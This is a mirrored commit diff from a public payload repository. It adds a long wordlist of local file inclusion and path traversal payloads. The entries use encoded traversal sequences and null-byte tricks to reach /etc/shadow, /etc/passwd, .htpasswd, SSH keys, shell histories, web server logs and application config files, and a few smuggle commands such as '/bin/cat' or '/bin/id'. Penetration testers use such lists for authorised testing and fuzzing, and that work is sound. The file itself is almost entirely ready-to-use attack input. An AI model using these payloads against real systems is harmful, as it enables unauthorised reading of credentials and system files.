mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-21 14:16:07 +00:00
More payloads for XSS/SQL/LFI/Upload and XXE
This commit is contained in:
parent
58aed12c9d
commit
94470a2544
867
PHP include/JHADDIX_LFI.txt
Normal file
867
PHP include/JHADDIX_LFI.txt
Normal file
@ -0,0 +1,867 @@
|
|||||||
|
/.../.../.../.../.../
|
||||||
|
\…..\\\…..\\\…..\\\
|
||||||
|
%00../../../../../../etc/passwd
|
||||||
|
%00/etc/passwd%00
|
||||||
|
%00../../../../../../etc/shadow
|
||||||
|
%00/etc/shadow%00
|
||||||
|
%0a/bin/cat%20/etc/passwd
|
||||||
|
%0a/bin/cat%20/etc/shadow
|
||||||
|
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||||
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
||||||
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||||
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
||||||
|
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
||||||
|
/../../../../../../../../%2A
|
||||||
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
||||||
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||||
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
||||||
|
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
|
||||||
|
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
|
||||||
|
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
|
||||||
|
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
|
||||||
|
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
|
||||||
|
=3D “/..” . “%2f..
|
||||||
|
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
|
||||||
|
admin/access_log
|
||||||
|
/admin/install.php
|
||||||
|
../../../administrator/inbox
|
||||||
|
/apache2/logs/access_log
|
||||||
|
/apache2/logs/access.log
|
||||||
|
/apache2/logs/error_log
|
||||||
|
/apache2/logs/error.log
|
||||||
|
/apache/logs/access_log
|
||||||
|
/apache/logs/access.log
|
||||||
|
../../../../../apache/logs/access.log
|
||||||
|
../../../../apache/logs/access.log
|
||||||
|
../../../apache/logs/access.log
|
||||||
|
../../apache/logs/access.log
|
||||||
|
../apache/logs/access.log
|
||||||
|
/apache/logs/error_log
|
||||||
|
/apache/logs/error.log
|
||||||
|
../../../../../apache/logs/error.log
|
||||||
|
../../../../apache/logs/error.log
|
||||||
|
../../../apache/logs/error.log
|
||||||
|
../../apache/logs/error.log
|
||||||
|
../apache/logs/error.log
|
||||||
|
/apache\php\php.ini
|
||||||
|
\\'/bin/cat%20/etc/passwd\\'
|
||||||
|
\\'/bin/cat%20/etc/shadow\\'
|
||||||
|
/.bash_history
|
||||||
|
/.bash_profile
|
||||||
|
/.bashrc
|
||||||
|
/../../../../../../../../bin/id|
|
||||||
|
/bin/php.ini
|
||||||
|
/boot/grub/grub.conf
|
||||||
|
/./././././././././././boot.ini
|
||||||
|
/../../../../../../../../../../../boot.ini
|
||||||
|
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||||
|
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
||||||
|
..//..//..//..//..//boot.ini
|
||||||
|
../../../../../../../../../../../../boot.ini
|
||||||
|
../../boot.ini
|
||||||
|
..\../..\../..\../..\../boot.ini
|
||||||
|
..\../..\../boot.ini
|
||||||
|
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||||
|
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||||
|
/../../../../../../../../../../../boot.ini%00
|
||||||
|
../../../../../../../../../../../../boot.ini%00
|
||||||
|
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
||||||
|
/../../../../../../../../../../../boot.ini%00.html
|
||||||
|
/../../../../../../../../../../../boot.ini%00.jpg
|
||||||
|
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
|
||||||
|
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||||
|
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
||||||
|
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
||||||
|
c:\apache\logs\access.log
|
||||||
|
c:\apache\logs\error.log
|
||||||
|
c:\AppServ\MySQL
|
||||||
|
C:/boot.ini
|
||||||
|
C:\boot.ini
|
||||||
|
/C:/inetpub/ftproot/
|
||||||
|
C:/inetpub/wwwroot/global.asa
|
||||||
|
C:\inetpub\wwwroot\global.asa
|
||||||
|
c:\inetpub\wwwroot\index.asp
|
||||||
|
/config.asp
|
||||||
|
../config.asp
|
||||||
|
config.asp
|
||||||
|
../config.inc.php
|
||||||
|
config.inc.php
|
||||||
|
../config.js
|
||||||
|
config.js
|
||||||
|
_config.php
|
||||||
|
../_config.php
|
||||||
|
../config.php
|
||||||
|
config.php
|
||||||
|
../_config.php%00
|
||||||
|
../../../../../../../../conf/server.xml
|
||||||
|
/core/config.php
|
||||||
|
/C:\Program Files\
|
||||||
|
c:\Program Files\Apache Group\Apache\logs\access.log
|
||||||
|
c:\Program Files\Apache Group\Apache\logs\error.log
|
||||||
|
/.cshrc
|
||||||
|
c:\System32\Inetsrv\metabase.xml
|
||||||
|
c:WINDOWS/system32/
|
||||||
|
d:\AppServ\MySQL
|
||||||
|
database.asp
|
||||||
|
database.js
|
||||||
|
database.php
|
||||||
|
data.php
|
||||||
|
dbase.php a
|
||||||
|
db.php
|
||||||
|
../../../../../../../dev
|
||||||
|
/D:\Program Files\
|
||||||
|
d:\System32\Inetsrv\metabase.xml
|
||||||
|
/etc/apache2/apache2.conf
|
||||||
|
/etc/apache2/conf/httpd.conf
|
||||||
|
/etc/apache2/httpd.conf
|
||||||
|
/etc/apache2/sites-available/default
|
||||||
|
/etc/apache2/vhosts.d/default_vhost.include
|
||||||
|
/etc/apache/apache.conf
|
||||||
|
/etc/apache/conf/httpd.conf
|
||||||
|
/etc/apache/httpd.conf
|
||||||
|
/etc/apt/sources.list
|
||||||
|
/etc/chrootUsers
|
||||||
|
/etc/crontab
|
||||||
|
/etc/defaultdomain
|
||||||
|
/etc/default/passwd
|
||||||
|
/etc/defaultrouter
|
||||||
|
/etc/fstab
|
||||||
|
/etc/ftpchroot
|
||||||
|
/etc/ftphosts
|
||||||
|
/etc/group
|
||||||
|
/etc/hostname.bge
|
||||||
|
/etc/hostname.ce0
|
||||||
|
/etc/hostname.ce1
|
||||||
|
/etc/hostname.ce2
|
||||||
|
/etc/hostname.ce3
|
||||||
|
/etc/hostname.dcelx0
|
||||||
|
/etc/hostname.dcelx1
|
||||||
|
/etc/hostname.dcelx2
|
||||||
|
/etc/hostname.dcelx3
|
||||||
|
/etc/hostname.dmfe0
|
||||||
|
/etc/hostname.dmfe1
|
||||||
|
/etc/hostname.dmfe2
|
||||||
|
/etc/hostname.dmfe3
|
||||||
|
/etc/hostname.dnet0
|
||||||
|
/etc/hostname.dnet1
|
||||||
|
/etc/hostname.dnet2
|
||||||
|
/etc/hostname.dnet3
|
||||||
|
/etc/hostname.ecn0
|
||||||
|
/etc/hostname.ecn1
|
||||||
|
/etc/hostname.ecn2
|
||||||
|
/etc/hostname.ecn3
|
||||||
|
/etc/hostname.elx0
|
||||||
|
/etc/hostname.elx1
|
||||||
|
/etc/hostname.elx2
|
||||||
|
/etc/hostname.elx3
|
||||||
|
/etc/hostname.elxl0
|
||||||
|
/etc/hostname.elxl1
|
||||||
|
/etc/hostname.elxl2
|
||||||
|
/etc/hostname.elxl3
|
||||||
|
/etc/hostname.eri0
|
||||||
|
/etc/hostname.eri1
|
||||||
|
/etc/hostname.eri2
|
||||||
|
/etc/hostname.eri3
|
||||||
|
/etc/hostname.ge0
|
||||||
|
/etc/hostname.ge1
|
||||||
|
/etc/hostname.ge2
|
||||||
|
/etc/hostname.ge3
|
||||||
|
/etc/hostname.hme0
|
||||||
|
/etc/hostname.hme1
|
||||||
|
/etc/hostname.hme2
|
||||||
|
/etc/hostname.hme3
|
||||||
|
/etc/hostname.ieef0
|
||||||
|
/etc/hostname.ieef1
|
||||||
|
/etc/hostname.ieef2
|
||||||
|
/etc/hostname.ieef3
|
||||||
|
/etc/hostname.iprb0
|
||||||
|
/etc/hostname.iprb1
|
||||||
|
/etc/hostname.iprb2
|
||||||
|
/etc/hostname.iprb3
|
||||||
|
/etc/hostname.le0
|
||||||
|
/etc/hostname.le1
|
||||||
|
/etc/hostname.le2
|
||||||
|
/etc/hostname.le3
|
||||||
|
/etc/hostname.lo
|
||||||
|
/etc/hostname.pcn0
|
||||||
|
/etc/hostname.pcn1
|
||||||
|
/etc/hostname.pcn2
|
||||||
|
/etc/hostname.pcn3
|
||||||
|
/etc/hostname.qfe0
|
||||||
|
/etc/hostname.qfe1
|
||||||
|
/etc/hostname.qfe2
|
||||||
|
/etc/hostname.qfe3
|
||||||
|
/etc/hostname.spwr0
|
||||||
|
/etc/hostname.spwr1
|
||||||
|
/etc/hostname.spwr2
|
||||||
|
/etc/hostname.spwr3
|
||||||
|
/etc/hosts
|
||||||
|
../../../../../../../../../../../../etc/hosts
|
||||||
|
../../../../../../../../../../../../etc/hosts%00
|
||||||
|
/etc/hosts.allow
|
||||||
|
/etc/hosts.deny
|
||||||
|
/etc/hosts.equiv
|
||||||
|
/etc/http/conf/httpd.conf
|
||||||
|
/etc/httpd.conf
|
||||||
|
/etc/httpd/conf.d/php.conf
|
||||||
|
/etc/httpd/conf.d/squirrelmail.conf
|
||||||
|
/etc/httpd/conf.d/ssl.conf
|
||||||
|
/etc/httpd/conf/httpd.conf
|
||||||
|
/etc/httpd/httpd.conf
|
||||||
|
/etc/httpd/logs/acces_log
|
||||||
|
/etc/httpd/logs/acces.log
|
||||||
|
../../../../../../../etc/httpd/logs/acces_log
|
||||||
|
../../../../../../../etc/httpd/logs/acces.log
|
||||||
|
/etc/httpd/logs/access_log
|
||||||
|
/etc/httpd/logs/access.log
|
||||||
|
../../../../../etc/httpd/logs/access_log
|
||||||
|
../../../../../etc/httpd/logs/access.log
|
||||||
|
/etc/httpd/logs/error_log
|
||||||
|
/etc/httpd/logs/error.log
|
||||||
|
../../../../../../../etc/httpd/logs/error_log
|
||||||
|
../../../../../../../etc/httpd/logs/error.log
|
||||||
|
../../../../../etc/httpd/logs/error_log
|
||||||
|
../../../../../etc/httpd/logs/error.log
|
||||||
|
/etc/httpd/php.ini
|
||||||
|
/etc/http/httpd.conf
|
||||||
|
/etc/inetd.conf
|
||||||
|
/etc/init.d/apache
|
||||||
|
/etc/init.d/apache2
|
||||||
|
/etc/issue
|
||||||
|
/etc/logrotate.d/ftp
|
||||||
|
/etc/logrotate.d/httpd
|
||||||
|
/etc/logrotate.d/proftpd
|
||||||
|
/etc/logrotate.d/vsftpd.log
|
||||||
|
/etc/mail/access
|
||||||
|
/etc/mailman/mm_cfg.py
|
||||||
|
/etc/make.conf
|
||||||
|
/etc/master.passwd
|
||||||
|
/etc/motd
|
||||||
|
/etc/my.cnf
|
||||||
|
/etc/mysql/my.cnf
|
||||||
|
/etc/netconfig
|
||||||
|
/etc/nsswitch.conf
|
||||||
|
/etc/opt/ipf/ipf.conf
|
||||||
|
/etc/opt/ipf/ipnat.conf
|
||||||
|
/./././././././././././etc/passwd
|
||||||
|
/../../../../../../../../../../etc/passwd
|
||||||
|
/../../../../../../../../../../etc/passwd^^
|
||||||
|
/..\../..\../..\../..\../..\../..\../etc/passwd
|
||||||
|
/etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../../etc/passwd
|
||||||
|
../../../../../../../etc/passwd
|
||||||
|
../../../../../../etc/passwd
|
||||||
|
../../../../../etc/passwd
|
||||||
|
../../../../etc/passwd
|
||||||
|
../../../etc/passwd
|
||||||
|
../../etc/passwd
|
||||||
|
../etc/passwd
|
||||||
|
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||||
|
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
||||||
|
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||||
|
etc/passwd
|
||||||
|
/etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../../etc/passwd%00
|
||||||
|
../../../../../../etc/passwd%00
|
||||||
|
../../../../../etc/passwd%00
|
||||||
|
../../../../etc/passwd%00
|
||||||
|
../../../etc/passwd%00
|
||||||
|
../../etc/passwd%00
|
||||||
|
../etc/passwd%00
|
||||||
|
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||||
|
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||||
|
/../../../../../../../../../../../etc/passwd%00.html
|
||||||
|
/../../../../../../../../../../../etc/passwd%00.jpg
|
||||||
|
../../../../../../etc/passwd&=%3C%3C%3C%3C
|
||||||
|
/etc/php4.4/fcgi/php.ini
|
||||||
|
/etc/php4/apache2/php.ini
|
||||||
|
/etc/php4/apache/php.ini
|
||||||
|
/etc/php4/cgi/php.ini
|
||||||
|
/etc/php5/apache2/php.ini
|
||||||
|
/etc/php5/apache/php.ini
|
||||||
|
/etc/php5/cgi/php.ini
|
||||||
|
/etc/php/apache2/php.ini
|
||||||
|
/etc/php/apache/php.ini
|
||||||
|
/etc/php/cgi/php.ini
|
||||||
|
/etc/php.d/dom.ini
|
||||||
|
/etc/php.d/gd.ini
|
||||||
|
/etc/php.d/imap.ini
|
||||||
|
/etc/php.d/json.ini
|
||||||
|
/etc/php.d/ldap.ini
|
||||||
|
/etc/php.d/mbstring.ini
|
||||||
|
/etc/php.d/mysqli.ini
|
||||||
|
/etc/php.d/mysql.ini
|
||||||
|
/etc/php.d/odbc.ini
|
||||||
|
/etc/php.d/pdo.ini
|
||||||
|
/etc/php.d/pdo_mysql.ini
|
||||||
|
/etc/php.d/pdo_odbc.ini
|
||||||
|
/etc/php.d/pdo_pgsql.ini
|
||||||
|
/etc/php.d/pdo_sqlite.ini
|
||||||
|
/etc/php.d/pgsql.ini
|
||||||
|
/etc/php.d/xmlreader.ini
|
||||||
|
/etc/php.d/xmlwriter.ini
|
||||||
|
/etc/php.d/xsl.ini
|
||||||
|
/etc/php.d/zip.ini
|
||||||
|
/etc/php.ini
|
||||||
|
/etc/php/php4/php.ini
|
||||||
|
/etc/php/php.ini
|
||||||
|
/etc/postfix/mydomains
|
||||||
|
/etc/proftp.conf
|
||||||
|
/etc/proftpd/modules.conf
|
||||||
|
/etc/protpd/proftpd.conf
|
||||||
|
/etc/pure-ftpd.conf
|
||||||
|
/etc/pureftpd.passwd
|
||||||
|
/etc/pureftpd.pdb
|
||||||
|
/etc/pure-ftpd/pure-ftpd.conf
|
||||||
|
/etc/pure-ftpd/pure-ftpd.pdb
|
||||||
|
/etc/pure-ftpd/pureftpd.pdb
|
||||||
|
/etc/release
|
||||||
|
/etc/resolv.conf
|
||||||
|
/etc/rpc
|
||||||
|
/etc/security/environ
|
||||||
|
/etc/security/failedlogin
|
||||||
|
/etc/security/group
|
||||||
|
/etc/security/lastlog
|
||||||
|
/etc/security/limits
|
||||||
|
/etc/security/passwd
|
||||||
|
/etc/security/user
|
||||||
|
/./././././././././././etc/shadow
|
||||||
|
/../../../../../../../../../../etc/shadow
|
||||||
|
/../../../../../../../../../../etc/shadow^^
|
||||||
|
/..\../..\../..\../..\../..\../..\../etc/shadow
|
||||||
|
/etc/shadow
|
||||||
|
../../../../../../../../../../../../etc/shadow
|
||||||
|
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||||
|
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
||||||
|
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||||
|
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
|
||||||
|
../../../../../../../../../../../../etc/shadow%00
|
||||||
|
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||||
|
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||||
|
etc/shadow%00
|
||||||
|
/etc/ssh/sshd_config
|
||||||
|
/etc/sudoers
|
||||||
|
/etc/syslog.conf
|
||||||
|
/etc/syslogd.conf
|
||||||
|
/etc/system
|
||||||
|
/etc/updatedb.conf
|
||||||
|
/etc/utmp
|
||||||
|
/etc/vfstab
|
||||||
|
/etc/vhcs2/proftpd/proftpd.conf
|
||||||
|
/etc/vsftpd.chroot_list
|
||||||
|
/etc/vsftpd.conf
|
||||||
|
/etc/vsftpd/vsftpd.conf
|
||||||
|
/etc/wtmp
|
||||||
|
/etc/wu-ftpd/ftpaccess
|
||||||
|
/etc/wu-ftpd/ftphosts
|
||||||
|
/etc/wu-ftpd/ftpusers
|
||||||
|
/.forward
|
||||||
|
/home2\bin\stable\apache\php.ini
|
||||||
|
/home/apache/conf/httpd.conf
|
||||||
|
/home/apache/httpd.conf
|
||||||
|
/home\bin\stable\apache\php.ini
|
||||||
|
/.htpasswd
|
||||||
|
.htpasswd
|
||||||
|
../.htpasswd
|
||||||
|
../install.php
|
||||||
|
install.php
|
||||||
|
../../../../../../../../../../../../localstart.asp
|
||||||
|
../../../../../../../../../../../../localstart.asp%00
|
||||||
|
/log/miscDir/accesslog
|
||||||
|
/.logout
|
||||||
|
/logs/access_log
|
||||||
|
/logs/access.log
|
||||||
|
../../../../../logs/access.log
|
||||||
|
../../../../logs/access.log
|
||||||
|
../../../logs/access.log
|
||||||
|
../../logs/access.log
|
||||||
|
../logs/access.log
|
||||||
|
/logs/error_log
|
||||||
|
/logs/error.log
|
||||||
|
../../../../../logs/error.log
|
||||||
|
../../../../logs/error.log
|
||||||
|
../../../logs/error.log
|
||||||
|
../../logs/error.log
|
||||||
|
../logs/error.log
|
||||||
|
/logs/pure-ftpd.log
|
||||||
|
/master.passwd
|
||||||
|
member/.htpasswd
|
||||||
|
members/.htpasswd
|
||||||
|
/.netrc
|
||||||
|
/NetServer\bin\stable\apache\php.ini
|
||||||
|
/opt/apache2/conf/httpd.conf
|
||||||
|
/opt/apache/conf/httpd.conf
|
||||||
|
/opt/lampp/logs/access_log
|
||||||
|
/opt/lampp/logs/access.log
|
||||||
|
/opt/lampp/logs/error_log
|
||||||
|
/opt/lampp/logs/error.log
|
||||||
|
/opt/xampp/etc/php.ini
|
||||||
|
/opt/xampp/logs/access_log
|
||||||
|
/opt/xampp/logs/access.log
|
||||||
|
/opt/xampp/logs/error_log
|
||||||
|
/opt/xampp/logs/error.log
|
||||||
|
.pass
|
||||||
|
../.pass
|
||||||
|
pass.dat
|
||||||
|
passwd
|
||||||
|
/.passwd
|
||||||
|
.passwd
|
||||||
|
../.passwd
|
||||||
|
passwd.dat
|
||||||
|
/php4\php.ini
|
||||||
|
/php5\php.ini
|
||||||
|
/php\php.ini
|
||||||
|
/PHP\php.ini
|
||||||
|
/private/etc/httpd/httpd.conf
|
||||||
|
/private/etc/httpd/httpd.conf.default
|
||||||
|
/proc/cpuinfo
|
||||||
|
/proc/interrupts
|
||||||
|
/proc/loadavg
|
||||||
|
/proc/meminfo
|
||||||
|
/proc/mounts
|
||||||
|
/proc/net/arp
|
||||||
|
/proc/net/dev
|
||||||
|
/proc/net/route
|
||||||
|
/proc/net/tcp
|
||||||
|
/proc/partitions
|
||||||
|
/proc/self/cmdline
|
||||||
|
/proc/self/envron
|
||||||
|
/proc/version
|
||||||
|
/.profile
|
||||||
|
/Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||||
|
/Program Files\Apache Group\Apache\conf\httpd.conf
|
||||||
|
/Program Files\Apache Group\Apache\logs\access.log
|
||||||
|
/Program Files\Apache Group\Apache\logs\error.log
|
||||||
|
/Program Files\xampp\apache\conf\httpd.conf
|
||||||
|
/../../../../pswd
|
||||||
|
/.rhosts
|
||||||
|
/root/.bash_history
|
||||||
|
/root/.bash_logut
|
||||||
|
root/.htpasswd
|
||||||
|
/root/.ksh_history
|
||||||
|
/root/.Xauthority
|
||||||
|
/.sh_history
|
||||||
|
/.shosts
|
||||||
|
/.ssh/authorized_keys
|
||||||
|
user/.htpasswd
|
||||||
|
../users.db.php
|
||||||
|
users.db.php
|
||||||
|
users/.htpasswd
|
||||||
|
/usr/apache2/conf/httpd.conf
|
||||||
|
/usr/apache/conf/httpd.conf
|
||||||
|
/usr/etc/pure-ftpd.conf
|
||||||
|
/usr/lib/cron/log
|
||||||
|
/usr/lib/php.ini
|
||||||
|
/usr/lib/php/php.ini
|
||||||
|
/usr/lib/security/mkuser.default
|
||||||
|
/usr/local/apache2/conf/httpd.conf
|
||||||
|
/usr/local/apache2/httpd.conf
|
||||||
|
/usr/local/apache2/logs/access_log
|
||||||
|
/usr/local/apache2/logs/access.log
|
||||||
|
/usr/local/apache2/logs/error_log
|
||||||
|
/usr/local/apache2/logs/error.log
|
||||||
|
/usr/local/apache/conf/httpd.conf
|
||||||
|
/usr/local/apache/conf/php.ini
|
||||||
|
/usr/local/apache/httpd.conf
|
||||||
|
/usr/local/apache/log
|
||||||
|
/usr/local/apache/logs
|
||||||
|
/usr/local/apache/logs/access_log
|
||||||
|
/usr/local/apache/logs/access_ log
|
||||||
|
/usr/local/apache/logs/access.log
|
||||||
|
/usr/local/apache/logs/access. log
|
||||||
|
../../../../../../../usr/local/apache/logs/access_ log
|
||||||
|
../../../../../../../usr/local/apache/logs/access. log
|
||||||
|
../../../../../usr/local/apache/logs/access_log
|
||||||
|
../../../../../usr/local/apache/logs/access.log
|
||||||
|
/usr/local/apache/logs/error_log
|
||||||
|
/usr/local/apache/logs/error.log
|
||||||
|
../../../../../../../usr/local/apache/logs/error_l og
|
||||||
|
../../../../../../../usr/local/apache/logs/error.l og
|
||||||
|
../../../../../usr/local/apache/logs/error_log
|
||||||
|
../../../../../usr/local/apache/logs/error.log
|
||||||
|
/usr/local/apps/apache2/conf/httpd.conf
|
||||||
|
/usr/local/apps/apache/conf/httpd.conf
|
||||||
|
/usr/local/cpanel/logs
|
||||||
|
/usr/local/cpanel/logs/access_log
|
||||||
|
/usr/local/cpanel/logs/error_log
|
||||||
|
/usr/local/cpanel/logs/license_log
|
||||||
|
/usr/local/cpanel/logs/login_log
|
||||||
|
/usr/local/cpanel/logs/stats_log
|
||||||
|
/usr/local/etc/apache2/conf/httpd.conf
|
||||||
|
/usr/local/etc/apache/conf/httpd.conf
|
||||||
|
/usr/local/etc/apache/vhosts.conf
|
||||||
|
/usr/local/etc/httpd/conf/httpd.conf
|
||||||
|
/usr/local/etc/httpd/logs/access_log
|
||||||
|
/usr/local/etc/httpd/logs/error_log
|
||||||
|
/usr/local/etc/php.ini
|
||||||
|
/usr/local/etc/pure-ftpd.conf
|
||||||
|
/usr/local/etc/pureftpd.pdb
|
||||||
|
/usr/local/httpd/conf/httpd.conf
|
||||||
|
/usr/local/lib/php.ini
|
||||||
|
/usr/local/php4/httpd.conf
|
||||||
|
/usr/local/php4/httpd.conf.php
|
||||||
|
/usr/local/php4/lib/php.ini
|
||||||
|
/usr/local/php5/httpd.conf
|
||||||
|
/usr/local/php5/httpd.conf.php
|
||||||
|
/usr/local/php5/lib/php.ini
|
||||||
|
/usr/local/php/httpd.conf
|
||||||
|
/usr/local/php/httpd.conf.php
|
||||||
|
/usr/local/php/lib/php.ini
|
||||||
|
/usr/local/pureftpd/etc/pure-ftpd.conf
|
||||||
|
/usr/local/pureftpd/etc/pureftpd.pdb
|
||||||
|
/usr/local/pureftpd/sbin/pure-config.pl
|
||||||
|
/usr/local/www/logs/thttpd_log
|
||||||
|
/usr/local/Zend/etc/php.ini
|
||||||
|
/usr/pkgsrc/net/pureftpd/
|
||||||
|
/usr/ports/contrib/pure-ftpd/
|
||||||
|
/usr/ports/ftp/pure-ftpd/
|
||||||
|
/usr/ports/net/pure-ftpd/
|
||||||
|
/usr/sbin/pure-config.pl
|
||||||
|
/usr/spool/lp/log
|
||||||
|
/usr/spool/mqueue/syslog
|
||||||
|
/var/adm
|
||||||
|
/var/adm/acct/sum/loginlog
|
||||||
|
/var/adm/aculog
|
||||||
|
/var/adm/aculogs
|
||||||
|
/var/adm/crash/unix
|
||||||
|
/var/adm/crash/vmcore
|
||||||
|
/var/adm/cron/log
|
||||||
|
/var/adm/dtmp
|
||||||
|
/var/adm/lastlog
|
||||||
|
/var/adm/lastlog/username
|
||||||
|
/var/adm/log/asppp.log
|
||||||
|
/var/adm/loginlog
|
||||||
|
/var/adm/log/xferlog
|
||||||
|
/var/adm/lp/lpd-errs
|
||||||
|
/var/adm/messages
|
||||||
|
/var/adm/pacct
|
||||||
|
/var/adm/qacct
|
||||||
|
/var/adm/ras/bootlog
|
||||||
|
/var/adm/ras/errlog
|
||||||
|
/var/adm/sulog
|
||||||
|
/var/adm/SYSLOG
|
||||||
|
/var/adm/utmp
|
||||||
|
/var/adm/utmpx
|
||||||
|
/var/adm/vold.log
|
||||||
|
/var/adm/wtmp
|
||||||
|
/var/adm/wtmpx
|
||||||
|
/var/adm/X0msgs
|
||||||
|
/var/apache/log
|
||||||
|
/var/apache/logs
|
||||||
|
/var/apache/logs/access_log
|
||||||
|
/var/apache/logs/error_log
|
||||||
|
/var/cpanel/cpanel.config
|
||||||
|
/var/cron/log
|
||||||
|
/var/lib/mlocate/mlocate.db
|
||||||
|
/var/lib/mysql/my.cnf
|
||||||
|
/var/local/www/conf/php.ini
|
||||||
|
/var/lock/samba
|
||||||
|
/var/log
|
||||||
|
/var/log/access_log
|
||||||
|
/var/log/access.log
|
||||||
|
../../../../../../../var/log/access_log
|
||||||
|
../../../../../../../var/log/access.log
|
||||||
|
../../../../../var/log/access_log
|
||||||
|
/var/log/acct
|
||||||
|
/var/log/apache2/access_log
|
||||||
|
/var/log/apache2/access.log
|
||||||
|
../../../../../../../var/log/apache2/access_log
|
||||||
|
../../../../../../../var/log/apache2/access.log
|
||||||
|
/var/log/apache2/error_log
|
||||||
|
/var/log/apache2/error.log
|
||||||
|
../../../../../../../var/log/apache2/error_log
|
||||||
|
../../../../../../../var/log/apache2/error.log
|
||||||
|
/var/log/apache/access_log
|
||||||
|
/var/log/apache/access.log
|
||||||
|
../../../../../../../var/log/apache/access_log
|
||||||
|
../../../../../../../var/log/apache/access.log
|
||||||
|
../../../../../var/log/apache/access_log
|
||||||
|
../../../../../var/log/apache/access.log
|
||||||
|
/var/log/apache/error_log
|
||||||
|
/var/log/apache/error.log
|
||||||
|
../../../../../../../var/log/apache/error_log
|
||||||
|
../../../../../../../var/log/apache/error.log
|
||||||
|
../../../../../var/log/apache/error_log
|
||||||
|
../../../../../var/log/apache/error.log
|
||||||
|
/var/log/apache-ssl/access.log
|
||||||
|
/var/log/apache-ssl/error.log
|
||||||
|
/var/log/auth
|
||||||
|
/var/log/authlog
|
||||||
|
/var/log/auth.log
|
||||||
|
/var/log/boot.log
|
||||||
|
/var/log/cron.log
|
||||||
|
